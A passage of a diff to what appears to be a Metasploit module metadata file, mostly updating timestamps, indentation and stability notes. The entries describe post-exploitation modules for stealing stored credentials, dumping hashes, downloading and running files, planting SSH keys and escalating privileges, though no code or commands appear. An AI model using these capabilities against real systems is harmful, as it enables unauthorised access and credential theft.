-    "description": "This module collects configuration files found on commonly installed\n        applications and services, such as Apache, MySQL, Samba, Sendmail, etc.\n        If a config file is found in its default path, the module will assume\n        that is the file we want.",
+    "description": "This module collects configuration files found on commonly installed\n          applications and services, such as Apache, MySQL, Samba, Sendmail, etc.\n          If a config file is found in its default path, the module will assume\n          that is the file we want.",
    "references": [

    ],
@@ -206829,7 +209195,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-12-06 13:06:50 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/gather/enum_configs.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_configs",
@@ -206866,7 +209232,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-03-11 17:23:44 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/linux/gather/enum_containers.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_containers",
@@ -206874,6 +209240,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "shell",
@@ -206893,7 +209268,7 @@
    "author": [
      "Cale Smith"
    ],
-    "description": "NagiosXI may store credentials of the hosts it monitors. This module extracts these credentials,\n          creating opportunities for lateral movement.",
+    "description": "NagiosXI may store credentials of the hosts it monitors. This module extracts these credentials,\n            creating opportunities for lateral movement.",
    "references": [

    ],
@@ -206903,7 +209278,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/gather/enum_nagios_xi.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_nagios_xi",
@@ -206941,7 +209316,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-21 00:46:44 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/gather/enum_network.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_network",
@@ -206968,7 +209343,7 @@
    "author": [
      "ohdae <bindshell@live.com>"
    ],
-    "description": "This module checks whether popular system hardening mechanisms are\n        in place, such as SMEP, SMAP, SELinux, PaX and grsecurity. It also\n        tries to find installed applications that can be used to hinder,\n        prevent, or detect attacks, such as tripwire, snort, and apparmor.\n\n        This module is meant to identify Linux Secure Modules (LSM) in addition\n        to various antivirus, IDS/IPS, firewalls, sandboxes and other security\n        related software.",
+    "description": "This module checks whether popular system hardening mechanisms are\n          in place, such as SMEP, SMAP, SELinux, PaX and grsecurity. It also\n          tries to find installed applications that can be used to hinder,\n          prevent, or detect attacks, such as tripwire, snort, and apparmor.\n\n          This module is meant to identify Linux Secure Modules (LSM) in addition\n          to various antivirus, IDS/IPS, firewalls, sandboxes and other security\n          related software.",
    "references": [

    ],
@@ -206978,7 +209353,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-26 21:26:52 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/gather/enum_protections.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_protections",
@@ -207055,7 +209430,7 @@
      "ohdae <bindshell@live.com>",
      "Roberto Espreto <robertoespreto@gmail.com>"
    ],
-    "description": "This module gathers system information. We collect\n        installed packages, installed services, mount information,\n        user list, user bash history and cron jobs",
+    "description": "This module gathers system information. We collect\n          installed packages, installed services, mount information,\n          user list, user bash history and cron jobs",
    "references": [

    ],
@@ -207065,7 +209440,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-01 14:56:28 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/gather/enum_system.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_system",
@@ -207092,7 +209467,7 @@
    "author": [
      "ohdae <bindshell@live.com>"
    ],
-    "description": "This module gathers the following user-specific information:\n        shell history, MySQL history, PostgreSQL history, MongoDB history,\n        Vim history, lastlog, and sudoers.",
+    "description": "This module gathers the following user-specific information:\n          shell history, MySQL history, PostgreSQL history, MongoDB history,\n          Vim history, lastlog, and sudoers.",
    "references": [

    ],
@@ -207102,7 +209477,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/gather/enum_users_history.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_users_history",
@@ -207187,7 +209562,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/gather/gnome_commander_creds.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/gnome_commander_creds",
@@ -207224,7 +209599,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-09-08 21:56:02 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/gather/gnome_keyring_dump.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/gnome_keyring_dump",
@@ -207263,7 +209638,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-04-09 13:23:05 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/linux/gather/haserl_read.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/haserl_read",
@@ -207271,6 +209646,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "shell",
@@ -207300,7 +209684,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-10-13 10:13:27 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/hashdump",
@@ -207427,7 +209811,7 @@
    "author": [
      "Jon Hart <jhart@spoofed.org>"
    ],
-    "description": "Post Module to obtain credentials saved for mount.cifs/mount.smbfs in\n        /etc/fstab on a Linux system.",
+    "description": "Post Module to obtain credentials saved for mount.cifs/mount.smbfs in\n          /etc/fstab on a Linux system.",
    "references": [

    ],
@@ -207437,7 +209821,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-09-29 22:34:38 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/gather/mount_cifs_creds.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/mount_cifs_creds",
@@ -207465,7 +209849,7 @@
      "rvrsh3ll",
      "Roberto Soares Espreto <robertoespreto@gmail.com>"
    ],
-    "description": "This module grab OpenVPN credentials from a running process\n        in Linux.\n\n        Note: --auth-nocache must not be set in the OpenVPN command line.",
+    "description": "This module grab OpenVPN credentials from a running process\n          in Linux.\n\n          Note: --auth-nocache must not be set in the OpenVPN command line.",
    "references": [
      "URL-https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh"
    ],
@@ -207475,7 +209859,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/gather/openvpn_credentials.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/openvpn_credentials",
@@ -207513,7 +209897,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-09-07 11:13:09 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/gather/phpmyadmin_credsteal.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/phpmyadmin_credsteal",
@@ -207539,7 +209923,7 @@
    "author": [
      "sinn3r <sinn3r@metasploit.com>"
    ],
-    "description": "This module collects PPTP VPN information such as client, server, password,\n        and IP from your target server's chap-secrets file.",
+    "description": "This module collects PPTP VPN information such as client, server, password,\n          and IP from your target server's chap-secrets file.",
    "references": [

    ],
@@ -207549,7 +209933,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-06-01 21:33:33 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/gather/pptpd_chap_secrets.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/pptpd_chap_secrets",
@@ -207576,7 +209960,7 @@
    "author": [
      "Harvey Phillips <xcellerator@gmx.com>"
    ],
-    "description": "This module collects the hostnames name and private keys of\n        any TOR Hidden Services running on the target machine. It\n        will search for torrc and if found, will parse it for the\n        directories of Hidden Services. However, root permissions\n        are required to read them as they are owned by the user that\n        TOR runs as, usually a separate account.",
+    "description": "This module collects the hostnames name and private keys of\n          any TOR Hidden Services running on the target machine. It\n          will search for torrc and if found, will parse it for the\n          directories of Hidden Services. However, root permissions\n          are required to read them as they are owned by the user that\n          TOR runs as, usually a separate account.",
    "references": [

    ],
@@ -207586,7 +209970,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-22 11:55:47 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/gather/tor_hiddenservices.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/tor_hiddenservices",
@@ -207674,7 +210058,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-24 11:22:19 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/manage/dns_spoofing.rb",
    "is_install_path": true,
    "ref_name": "linux/manage/dns_spoofing",
@@ -207701,7 +210085,7 @@
    "author": [
      "Joshua D. Abraham <jabra@praetorian.com>"
    ],
-    "description": "This module downloads and runs a file with bash. It first tries to uses curl as\n        its HTTP client and then wget if it's not found. Bash found in the PATH is used\n        to execute the file.",
+    "description": "This module downloads and runs a file with bash. It first tries to uses curl as\n          its HTTP client and then wget if it's not found. Bash found in the PATH is used\n          to execute the file.",
    "references": [

    ],
@@ -207711,7 +210095,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/manage/download_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/manage/download_exec",
@@ -207785,7 +210169,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-24 11:22:19 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/manage/iptables_removal.rb",
    "is_install_path": true,
    "ref_name": "linux/manage/iptables_removal",
@@ -207822,7 +210206,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-24 11:22:19 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/manage/pseudo_shell.rb",
    "is_install_path": true,
    "ref_name": "linux/manage/pseudo_shell",
@@ -207859,7 +210243,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/manage/sshkey_persistence.rb",
    "is_install_path": true,
    "ref_name": "linux/manage/sshkey_persistence",
@@ -207897,7 +210281,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-11-22 14:11:03 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/escalate/aws_create_iam_user.rb",
    "is_install_path": true,
    "ref_name": "multi/escalate/aws_create_iam_user",
@@ -207925,7 +210309,7 @@
      "Jann Horn",
      "joev <joev@metasploit.com>"
    ],
-    "description": "This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.\n        CUPS allows members of the lpadmin group to make changes to the cupsd.conf\n        configuration, which can specify an Error Log path. When the user visits the\n        Error Log page in the web interface, the cupsd daemon (running with setuid root)\n        reads the Error Log path and echoes it as plaintext.\n\n        This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4\n        as long as the session is in the lpadmin group.\n\n        Warning: if the user has set up a custom path to the CUPS error log,\n        this module might fail to reset that path correctly. You can specify\n        a custom error log path with the ERROR_LOG datastore option.",
+    "description": "This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.\n            CUPS allows members of the lpadmin group to make changes to the cupsd.conf\n            configuration, which can specify an Error Log path. When the user visits the\n            Error Log page in the web interface, the cupsd daemon (running with setuid root)\n            reads the Error Log path and echoes it as plaintext.\n\n            This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4\n            as long as the session is in the lpadmin group.\n\n            Warning: if the user has set up a custom path to the CUPS error log,\n            this module might fail to reset that path correctly. You can specify\n            a custom error log path with the ERROR_LOG datastore option.",
    "references": [
      "CVE-2012-5519",
      "OSVDB-87635",
@@ -207937,7 +210321,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/escalate/cups_root_file_read.rb",
    "is_install_path": true,
    "ref_name": "multi/escalate/cups_root_file_read",
@@ -207963,7 +210347,7 @@
    "author": [
      "0a29406d9794e4f9b30b3c5d6702c708"
    ],
-    "description": "Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,\n          creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these\n          filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.\n          This, and all the other packets, are appended to /etc/passwd.\n\n          Successful exploitation results in the creation of a new superuser account.\n\n          This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap\n          files and truncate /etc/passwd. Note that if this module fails, you can potentially induce\n          a permanent DoS on the target by corrupting the /etc/passwd file.",
+    "description": "Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,\n            creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these\n            filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.\n            This, and all the other packets, are appended to /etc/passwd.\n\n            Successful exploitation results in the creation of a new superuser account.\n\n            This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap\n            files and truncate /etc/passwd. Note that if this module fails, you can potentially induce\n            a permanent DoS on the target by corrupting the /etc/passwd file.",
    "references": [
      "BID-54472",
      "URL-http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html",
@@ -207975,7 +210359,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/escalate/metasploit_pcaplog.rb",
    "is_install_path": true,
    "ref_name": "multi/escalate/metasploit_pcaplog",
@@ -208013,7 +210397,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/apple_ios_backup.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/apple_ios_backup",
@@ -208050,7 +210434,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-08-02 15:55:24 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/aws_ec2_instance_metadata.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/aws_ec2_instance_metadata",
@@ -208125,7 +210509,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/check_malware.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/check_malware",
@@ -208162,7 +210546,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-15 07:19:46 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/chrome_cookies.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/chrome_cookies",
@@ -208246,7 +210630,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/dbvis_enum.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/dbvis_enum",
@@ -208283,7 +210667,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/dns_bruteforce.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/dns_bruteforce",
@@ -208320,7 +210704,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/dns_reverse_lookup.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/dns_reverse_lookup",
@@ -208357,7 +210741,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-09-17 19:38:43 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/dns_srv_lookup.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/dns_srv_lookup",
@@ -208394,7 +210778,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-08-25 18:15:24 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/docker_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/docker_creds",
@@ -208431,7 +210815,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/multi/gather/enum_hexchat.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/enum_hexchat",
@@ -208439,6 +210823,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "shell",
@@ -208468,7 +210861,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-02-16 13:56:50 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/multi/gather/enum_software_versions.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/enum_software_versions",
@@ -208476,6 +210869,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "meterpreter",
@@ -208495,7 +210897,7 @@
    "author": [
      "theLightCosine <theLightCosine@metasploit.com>"
    ],
-    "description": "This module will attempt to enumerate any VirtualBox VMs on the target machine.\n        Due to the nature of VirtualBox, this module can only enumerate VMs registered\n        for the current user, therefore, this module needs to be invoked from a user context.",
+    "description": "This module will attempt to enumerate any VirtualBox VMs on the target machine.\n          Due to the nature of VirtualBox, this module can only enumerate VMs registered\n          for the current user, therefore, this module needs to be invoked from a user context.",
    "references": [

    ],
@@ -208505,7 +210907,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-09-30 15:45:52 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/enum_vbox.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/enum_vbox",
@@ -208590,7 +210992,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-10-08 09:50:25 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/fetchmailrc_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/fetchmailrc_creds",
@@ -208627,7 +211029,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/filezilla_client_cred.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/filezilla_client_cred",
@@ -208664,7 +211066,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/find_vmx.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/find_vmx",
@@ -208703,7 +211105,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/firefox_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/firefox_creds",
@@ -208731,7 +211133,7 @@
      "Dhiru Kholia <dhiru@openwall.com>",
      "Henry Hoggard"
    ],
-    "description": "This module will collect the contents of all users' .gnupg directories on the targeted\n        machine. Password protected secret keyrings can be cracked with John the Ripper (JtR).",
+    "description": "This module will collect the contents of all users' .gnupg directories on the targeted\n          machine. Password protected secret keyrings can be cracked with John the Ripper (JtR).",
    "references": [

    ],
@@ -208741,7 +211143,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-12-05 08:46:56 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/gpg_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/gpg_creds",
@@ -208780,7 +211182,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-10-29 04:31:12 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/grub_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/grub_creds",
@@ -208817,7 +211219,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/irssi_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/irssi_creds",
@@ -208853,7 +211255,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/jboss_gather.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/jboss_gather",
@@ -208889,7 +211291,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-12-27 12:32:26 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/jenkins_gather.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/jenkins_gather",
@@ -208928,7 +211330,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-11-22 14:11:03 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/lastpass_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/lastpass_creds",
@@ -208965,7 +211367,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/maven_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/maven_creds",
@@ -209049,7 +211451,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-12-23 11:36:38 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/multi_command.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/multi_command",
@@ -209085,7 +211487,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-10-08 09:50:25 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/netrc_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/netrc_creds",
@@ -209121,7 +211523,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/pgpass_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/pgpass_creds",
@@ -209159,7 +211561,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/pidgin_cred.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/pidgin_cred",
@@ -209196,7 +211598,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/ping_sweep.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/ping_sweep",
@@ -209223,7 +211625,7 @@
    "author": [
      "Jon Hart <jon_hart@rapid7.com>"
    ],
-    "description": "Post module to obtain credentials saved for RDP and VNC from Remmina's configuration files.\n        These are encrypted with 3DES using a 256-bit key generated by Remmina which is (by design)\n        stored in (relatively) plain text in a file that must be properly protected.",
+    "description": "Post module to obtain credentials saved for RDP and VNC from Remmina's configuration files.\n          These are encrypted with 3DES using a 256-bit key generated by Remmina which is (by design)\n          stored in (relatively) plain text in a file that must be properly protected.",
    "references": [

    ],
@@ -209233,7 +211635,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-02-19 20:35:33 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/remmina_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/remmina_creds",
@@ -209270,7 +211672,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/resolve_hosts.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/resolve_hosts",
@@ -209306,7 +211708,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/rsyncd_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/rsyncd_creds",
@@ -209343,7 +211745,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/rubygems_api_key.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/rubygems_api_key",
@@ -209379,7 +211781,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-12-23 11:36:38 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/run_console_rc_file.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/run_console_rc_file",
@@ -209416,7 +211818,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-05-15 09:38:15 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/multi/gather/saltstack_salt.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/saltstack_salt",
@@ -209424,6 +211826,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "shell",
@@ -209453,7 +211864,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/skype_enum.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/skype_enum",
@@ -209490,7 +211901,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/ssh_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/ssh_creds",
@@ -209527,7 +211938,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
